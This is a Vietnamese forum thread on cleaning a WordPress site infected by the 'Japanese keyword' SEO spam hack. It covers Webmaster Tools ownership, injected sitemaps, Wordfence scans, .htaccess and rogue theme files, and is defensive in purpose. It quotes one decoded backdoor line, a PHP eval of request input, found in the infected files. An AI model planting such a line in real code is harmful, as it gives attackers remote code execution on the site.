Cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật

Thảo luận trong 'Thủ Thuật SEO - SEO Tip' bắt đầu bởi dnxnguyen, 26/9/17.

  1. dnxnguyen

    dnxnguyen New Member

    Bài viết:
    13
    Đã thích:
    2
    Mình biết phải tốn rất nhiều thời gian và công sức để SEO các từ khóa lên Top. Tuy nhiên, khi các website khi không may bị dính mã độc sẽ khiến công sức các bạn gầy dựng bao lâu có thể tan thành mây khói chỉ trong vài ngày.
    Bài viết sau đây sẽ hướng dẫn các bạn cách chi tiết cách fix lỗi site bị nhiễm mã độc và index tiếng Nhật. Mình sẽ không đi sâu vào lý do việc website bị hack.
    Các website dùng WordPress thường là đối tượng bị dính mã độc khá nặng, khiến cho website tự động index link tiếng Nhật lên kết quả tìm kiếm Google, điển hình như sau:
    Capture.JPG
    1. Kiểm tra quyền truy cập WMT Webmaster Tool
    Website bị nhiễm mã độc và index link tiếng Nhật sử dụng liên kết đến các cửa hàng bán hàng giả mạo và sau đó được hiển thị trong tìm kiếm của Google (Có thể kiểm tra những đường link này theo dạng site:domain). Với loại hack này, hacker thường sẽ tự thêm mình làm chủ sở hữu tài sản trong Google Webmaster Tool (WMT). Vì thế, bước đầu tiên bạn phải xóa quyền sở hữu của tài khoản lạ trong WMT

    - Vào đường link sau:
    Mã:
     https://www.google.com/webmasters/verification
    1.
    - Vào "chi tiết xác minh" để xem cách "tài khoản lạ" xác minh sở hữu website.
    2.
    - Sau đó, vào CMS để xóa quyền sở hữu website này. (Trước khi bắt đầu, tạo một bản sao của bất kỳ tệp nào trước khi bạn xóa chúng, trong trường hợp bạn cần khôi phục chúng sau)
    + Mã thông báo xác minh cần xóa thường là tệp HTML trên thư mục gốc của trang web trên CMS.
    + Bạn thường có thể kiểm tra xem đã xoá thành công mã thông báo xác minh được tạo ra bằng cách điều hướng đến tệp token xác minh mô phỏng như thế nào Domain/google[random number and letters].html
    3.JPG
    Ví dụ: Website của mình có một mã xác minh: google-site-verification: google0003f30bc19bd379.html. Trên thanh URL gõ đường dẫn Domain/google0003f30bc19bd379.html. Nếu kết quả là 404 thì bạn đã xóa thành công tài khoản này
    4.
    - Đi kèm với xác minh chủ sở hữu bằng tệp token, hacker cũng chèn vào một file sitemap chưa các link độc hại để website index nhanh hơn. Bạn cũng cần xóa file này đi
    5.JPG
    2. Download Plugin Wordfence Security về để quét toàn bộ site
    Đây là cách rất nhanh để xác định các tập tin được hacker rải mã độc vào CMS. Đây là một plug-in về bảo mật miễn phí của WP. Sử dụng chức năng "scan" để quét các file. Sau đấy bạn dựa vào đó để sửa từng thư mục. Update các theme, phiên bản WP.

    Các khối mã cần xóa:
    Quét qua các tệp tin đáng ngờ mà bạn đã xác định để tìm các khối mã obfuscated. Mã obfuscated như một sự kết hợp của các chữ cái và chữ số sắp xếp lộn xộn thường được đặt trước bởi sự kết hợp của các hàm PHP như:
    Một số mã mình đã xóa:
    Decode đoạn trên ra kết quả <?php eval($_REQUEST[itongtong]);. Bạn sẽ tìm thấy request này ở file error_log

    Một số dòng có ở đầu file có dạng :
    Bạn có thể so sánh file bị thay đổi so với mã nguồn Wordpress :
    Mã:
     https://github.com/WordPress/WordPress
    nếu không biết cần phải xóa những đọan nào.

    3. Kiểm tra tập tin .htaccess của bạn

    - Tìm kiếm vị trí các file .htaccess. Keyword ".htaccess file location" + tên CMS (WordPress, Joomla, ...)
    - Tìm kiếm file .htaccess mặc định. Keyword "default .htaccess file" và tên của CMS (WordPress, Joomla, ...), thay thế vào các file đã có.

    Lưu ý: .htaccess thường là một "tập tin ẩn". Hãy cho phép hiển thị tất cả các tập tin ẩn khi bạn đang tìm kiếm vị trí những file đó

    4. Sau khi xóa sạch mã độc, index nhanh lại các link bị mất
    Sử dụng công cụ "Tìm nạp như Google" trên WMT để index lại trang chủ SAU KHI XÓA SẠCH MÃ ĐỘC
    Vào phần "Lỗi thu thập dữ liệu" trên WMT để xóa các link 404

    Cách kiểm tra website đã fix xong chưa
    Do cache nên sau khi fix sẽ phải chờ 1 khoảng time dài để biết website đã fix hết link tiếng Nhật chưa. Có thể kiểm tra nhanh bằng các cách sau:
    - Thứ hạng từ khóa trở lại
    - Gõ tìm kiếm sau: "site:domain japan"
    5. Vấn đề với tập tin index.php
    Có một việc mất khá nhiều thời gian cửa mình là mã độc ở tập tin index.php. Mỗi khi mình xóa, đến hôm sau lại xuất hiện mã độc tại file này.
    Trong khi phân tích các tập tin, mình tìm thấy một tập tin đáng ngờ. Tên tệp là " db_lookups.php " trong thư mục public_html\wp-content\themes\twentyfourteen. Sau đó, mình tìm trong mã nguồn WordPress thì "Không có tập tin nào tên là db_lookups.php"
    6.
    Ngoài ra còn có tập tin " comay.php " trong thư mục public_html\wp-content\themes\twentyfourteen. Cũng không có trong mã nguồn WordPress và cần xóa. Về tác dụng tập tin này mình chưa biết =))
    7.
    Tiếp theo, kiểm tra trong file .htaccess
    Trong tập mặc định file .htaccess không có dòng này:
    Sau đó, mình kiểm tra file access_log trong thư mục logs/access_log tìm thấy 1 request đến file db_lookups.php
    Mình đã xóa mã được chèn vào index.php và nhập vào đường dẫn sau:
    Sau đó kiểm tra tập tin index.php và đã có mã độc trở lại.
    Phần 5 này mình chia sẻ cho những ai đang thực hiện bảo mật bằng website bằng file .htaccess và không muốn sửa các tập tin này
    Đại loại là sửa như thế!
    Mã:
    http://ictnews.vn/trang-chinh/trang-nhat/cach-fix-loi-site-bi-nhiem-ma-doc-va-index-tieng-nhat-159033.ict
     
    Đang tải...
    banga and phankt like this.
  2. Phan thanh tú

    Phan thanh tú Member

    Bài viết:
    68
    Đã thích:
    4
    cảm ơn bác đã chia sẻ, thông tin rất bổ ích...hy vong ae có cái để chỉnh sửa :D
     
  3. phankt

    phankt Member

    Bài viết:
    100
    Đã thích:
    15
    Các bước trên bạn làm bao lâu thì index nó mất hết hoặc mất đi nhiều
    Trong bài mình thấy bạn không nói đến chặn index các url có cấu trúc..
    Thông thường hacker sẽ tạo ra nhiều folder để chưa file index lỗi. tìm những cấu trúc url để chặn index các url này thì thời gian xóa index của url lỗi sẽ nhanh hơn.
     
  4. dnxnguyen

    dnxnguyen New Member

    Bài viết:
    13
    Đã thích:
    2
    Mình dùng "Tìm nạp như Google" trên WMT để index lại link
    Sau đó Vào phần "Lỗi thu thập dữ liệu" trên WMT để xóa các link 404

    Việc index lại link thì bạn nên index các link thấy trong tìm kiếm "site:domain japan"
    Mình làm thì trong một tuần các từ khóa đều đã lên lại nhé
     
  5. dihngoclam113

    dihngoclam113 Member

    Bài viết:
    305
    Đã thích:
    53
    Dùng share hosting của Việt thường dễ bị hacker đánh cả cụm lắm, còn hosting nước ngoài thì rớt mạng hoài phát chán.
     
  6. htung147

    htung147 Member

    Bài viết:
    71
    Đã thích:
    4
    có bạn nào dùng cách này có hiệu quả chưa nhỉ :) mình thử nghiệm xong thì sẽ báo vơi các bạn nhé !!!
     
  7. dvchothuephongdn

    dvchothuephongdn New Member

    Bài viết:
    1
    Đã thích:
    0
    cám ơn bác, đang bị dính cái này mà chưa biết cách khắc phục.
     
  8. dnxnguyen

    dnxnguyen New Member

    Bài viết:
    13
    Đã thích:
    2
    Chắc xong bước 1,2 rồi nhỉ, có vđ gì không bác =))
     
  9. pcccsaigon

    pcccsaigon Member

    Bài viết:
    205
    Đã thích:
    35
    không biết làm luôn, mà còn chưa biết thuê ai uy tín, sợ thuê xong rồi lại bị cài cái khác thì toi, bác nào uy tín trên này sửa hộ không nhỉ, có tính phí
     
  10. thanghekhoc3319

    thanghekhoc3319 Member

    Bài viết:
    136
    Đã thích:
    13
    Để tránh cái này không nên dùng theme free nhé dễ bị chèn mã độc lắm
     
Tags:
Đang tải...
Đang tải...